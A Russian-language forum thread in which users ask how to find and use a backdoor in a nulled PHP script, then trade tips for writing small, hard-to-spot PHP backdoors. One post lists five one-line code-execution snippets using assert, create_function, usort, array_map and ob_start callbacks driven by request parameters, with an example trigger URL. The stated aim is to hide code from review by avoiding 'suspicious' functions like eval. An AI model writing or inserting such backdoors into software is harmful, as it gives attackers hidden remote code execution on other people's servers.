Всем привет, имеется скриптик, известно что автором был оставлен бэкдор. Как мне его найти и как им пользоваться? Спасибо.
evla я уже искал, безрезультатно, preg_replace - надо будет посмотреть. Есть ещё какие -нибудь варианты бэкдоров?
|qbz| Полно? Приведи еще хотя бы парочку примеров бэкдоров. Не считаются те которые в колбэках используют eval()
plaeer просмотреть построчно весь код, искать то, чего там быть не должно. А что за скрипт? ^^ b3 почти любая функция в определенных условиях может стать бекдором. И да, выполнением кода не стоит ограничивать фантазию
Согласен, можно загрузчик файлов сделать в темп папку и последующий инклуд етих файлов, но меня интересует тема бэкдоров с минимальным кодом в 1-3 строки, желательно выполнение кода.
http://skripters.com/raznoe_skripti/7226-lightmon-2.1-nulled.html PS:Если будет что в паблик не вылаживайте, а то начнётся ))
Code: 1. $a($b); При register_globals=on код будет срабатывать по линку типа script.php?a=assert&b=phpinfo(); Code: 2. $f = create_function(){return $_REQUEST['a'];} $f(0); Code: 3. usort($_REQUEST['a'],$_REQUEST['b']) Code: 4. array_map($_REQUEST[a], $_REQUEST[b]); //script.php?a=-1-&b[]=phpinfo Code: 5. ob_start($_REQUEST['a']); и еще дофига, палить небуду
|qbz| В этом направлении я не думал даже, а ведь точно, хороший способ скрыть код не используя "палевные" функции. У тебя ошибка в create_function но то не суть. Да уже и не надо и так все ясно =)